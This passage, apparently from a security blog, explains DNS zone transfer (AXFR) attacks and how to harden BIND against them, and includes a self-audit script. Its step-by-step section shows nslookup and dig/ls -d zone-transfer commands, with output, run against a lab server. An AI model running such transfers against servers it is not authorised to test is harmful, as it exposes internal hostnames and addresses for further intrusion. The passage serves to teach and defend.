Understanding Zone Transfer Attacks in DNS
DNS (Domain Name System) is a critical component of the internet infrastructure that translates domain names into IP addresses. However, a misconfigured DNS server is exposed to a number of attacks, including zone transfer attacks. In a zone transfer attack, an attacker obtains a complete copy of a DNS server’s zone data, which can be used to plan further attacks. In this blog post, we will discuss what zone transfer attacks are, how they work, and how to prevent them. We will also demonstrate how to perform a zone transfer against a lab DNS server from a Kali Linux VM and from a Windows VM, along with the commands and their outputs.
Origin of Attack
Zone transfers exist as a necessary function of DNS servers. They allow a secondary DNS server to replicate a primary DNS server’s zone data, ensuring that the DNS service remains available in case of a primary server failure. However, if not configured securely, zone transfers can be exploited by attackers to obtain sensitive information about a DNS server’s zone data, leading to severe consequences.
Zone transfer attacks take advantage of a misconfiguration rather than a flaw in the protocol itself: a DNS server that answers zone transfer (AXFR) requests from any client will hand over all of its zone data to whoever asks. Attackers use standard tools to identify which servers are authoritative for a domain and then request a zone transfer from each of them. When a transfer succeeds, the server returns every record in the zone, including sensitive information such as internal IP addresses, subdomains, and mail servers, which the attacker can use to plan further attacks or gain unauthorized access to systems. To prevent these attacks, DNS administrators need to follow secure configurations and limit zone transfers to authorized secondary servers only.
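The following BIND 9 named.conf fragments are an added example, not configuration from the original post, showing the weak setting beside the corrected one. They assume a primary nameserver at 192.168.1.100 and a single secondary at 192.168.1.101 (constructed addresses), the zone-type keywords of BIND 9.16 and later (`primary`/`secondary`; older releases use `master`/`slave`), and a TSIG key name and secret that are placeholders.

```conf
# WEAK: no allow-transfer statement at all. Older BIND releases default to
# allow-transfer { any; }, so any client that can reach 53/TCP can pull the
# whole zone with AXFR, which is exactly what "dig axfr" exploits.
zone "example.com" {
    type primary;
    file "/etc/bind/db.example.com";
};

# HARDENED (primary, 192.168.1.100): deny transfers globally, then allow them
# for this zone only to a client that signs the request with the shared key.
options {
    allow-transfer { none; };            # global default: refuse AXFR/IXFR
};

key "xfer-key" {                         # constructed key name
    algorithm hmac-sha256;
    secret "REPLACE_WITH_BASE64_SECRET"; # placeholder; generate with tsig-keygen
};

zone "example.com" {
    type primary;
    file "/etc/bind/db.example.com";
    allow-transfer { key "xfer-key"; };  # only TSIG-signed requests succeed
    also-notify { 192.168.1.101; };      # tell the secondary when the zone changes
};

# HARDENED (secondary, 192.168.1.101): present the same key when pulling the
# zone from the primary.
key "xfer-key" {
    algorithm hmac-sha256;
    secret "REPLACE_WITH_BASE64_SECRET";
};

server 192.168.1.100 {
    keys { "xfer-key"; };
};

zone "example.com" {
    type secondary;
    primaries { 192.168.1.100; };
    file "/var/cache/bind/db.example.com";
};
```

Restricting by IP address alone (`allow-transfer { 192.168.1.101; };`) is better than nothing, but a TSIG key ties the transfer to a shared secret rather than to a spoofable source address, and the global `allow-transfer { none; }` means any zone that forgets its own statement fails closed instead of open.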
Performing a Zone Transfer Attack: A Step-by-Step Guide
Using the “nslookup” command in Kali Linux to perform DNS enumeration:
$ nslookup -type=ns example.com 192.168.1.100
Server: 192.168.1.100
Address: 192.168.1.100#53
Non-authoritative answer:
example.com nameserver = ns1.example.com.
example.com nameserver = ns2.example.com.
Authoritative answers can be found from:
This output indicates that the target DNS server (192.168.1.100) is authoritative for the “example.com” domain, and provides the nameservers for the domain.
Using the “dig” command in Kali Linux to attempt a zone transfer:
$ dig axfr example.com @192.168.1.100
; <<>> DiG 9.11.5-P4-5.1+deb10u5-Debian <<>> axfr example.com @192.168.1.100
;; global options: +cmd
example.com. 86400 IN SOA ns1.example.com. admin.example.com. 2022030101 86400 7200 3600000 86400
example.com. 86400 IN NS ns1.example.com.
example.com. 86400 IN NS ns2.example.com.
www.example.com. 86400 IN A 192.168.1.200
mail.example.com. 86400 IN A 192.168.1.201
This output indicates that the zone transfer was successful and displays the full DNS zone data for the “example.com” domain, including domain names, IP addresses, and other DNS records.
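The script below is an added example, not part of the original post, for checking whether the nameservers of a zone you administer hand the zone to an unauthenticated client, the condition the dig output above demonstrates. It assumes `dig` from the BIND utilities is installed; the zone name, resolver address and the sample dig output embedded for the no-argument demo are constructed.

```shell
#!/bin/sh
# AXFR self-audit: enumerate a zone's NS records, attempt a zone transfer from
# each nameserver, and report which ones allow it. Intended to run from cron or
# CI against your own zones; a non-zero exit means at least one server is open.

# A resource record as dig prints it: "owner TTL IN TYPE rdata".
# Comment and status lines from dig start with ';' and never match.
RECORD_RE='^[^;[:space:]][^[:space:]]*[[:space:]]+[0-9]+[[:space:]]+IN[[:space:]]+'

# classify_axfr: read dig's AXFR output on stdin and print one verdict:
#   open    - zone records came back (the transfer succeeded)
#   refused - dig printed "; Transfer failed." (server answered REFUSED/NOTAUTH)
#   error   - no usable answer (timeout, unreachable host, unknown server)
classify_axfr() {
    out=$(cat)
    if printf '%s\n' "$out" | grep -q '^; Transfer failed'; then
        echo refused
    elif printf '%s\n' "$out" | grep -Eq "$RECORD_RE"; then
        echo open
    else
        echo error
    fi
}

# count_records: number of resource records in dig's AXFR output on stdin.
# grep -c exits 1 when the count is 0, so "|| true" keeps set -e callers happy.
count_records() {
    grep -Ec "$RECORD_RE" || true
}

# audit_zone ZONE [RESOLVER]: look up the NS set (via RESOLVER if given), try
# AXFR from each nameserver, print one line per server, return 1 if any is open.
audit_zone() {
    zone=$1
    resolver=${2:+@$2}
    rc=0
    nameservers=$(dig +short NS "$zone" $resolver || true)
    if [ -z "$nameservers" ]; then
        echo "no NS records found for $zone" >&2
        return 2
    fi
    for ns in $nameservers; do
        out=$(dig +time=3 +tries=1 axfr "$zone" "@$ns" || true)
        verdict=$(printf '%s\n' "$out" | classify_axfr)
        records=$(printf '%s\n' "$out" | count_records)
        printf '%-32s %-8s %s records\n' "$ns" "$verdict" "$records"
        if [ "$verdict" = open ]; then
            rc=1
        fi
    done
    return $rc
}

# With no arguments, demonstrate the classifier on constructed dig output (the
# records from the successful transfer above); otherwise audit the zone given
# on the command line, e.g.:  ./axfr-audit.sh example.com 192.168.1.100
if [ $# -eq 0 ]; then
    printf 'example.com.\t86400\tIN\tSOA\tns1.example.com. admin.example.com. 2022030101 86400 7200 3600000 86400\nwww.example.com.\t86400\tIN\tA\t192.168.1.200\n' | classify_axfr
else
    audit_zone "$@"
fi
```

On a correctly configured primary every nameserver should report `refused`; an `open` line is the finding to fix by restricting `allow-transfer` on that server, and `error` usually means the host is unreachable from where the audit runs rather than a misconfiguration.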
Using the “nslookup” command in Windows to perform DNS enumeration:
C:\> nslookup -type=ns example.com 192.168.1.100
Server: dns.example.local
Address: 192.168.1.100
Non-authoritative answer:
example.com nameserver = ns1.example.com.
example.com nameserver = ns2.example.com.
Authoritative answers can be found from:
This output is similar to the output from the Kali Linux “nslookup” command and indicates that the target DNS server (192.168.1.100) is authoritative for the “example.com” domain, and provides the nameservers for the domain.
Using the “nslookup” command in Windows to attempt a zone transfer:
C:\> nslookup
Default Server: dns.example.local
Address: 192.168.1.100
> server 192.168.1.100
Default Server: dns.example.local
Address: 192.168.1.100
> set type=any
> ls -d example.com
[192.168.1.100]
example.com. SOA ns1.example.com. admin.example.com. 2022030101 86400 7200 3600000 86400
example.com. NS ns1.example.com.
example.com. NS ns2.example.com.
www.example.com. A 192.168.1.200
mail.example.com. A 192.168.1.201
This output is similar to the output from the Kali Linux “dig” command and indicates that the zone transfer was successful and displays the full DNS zone data for the “example.com” domain, including domain names, IP addresses, and other DNS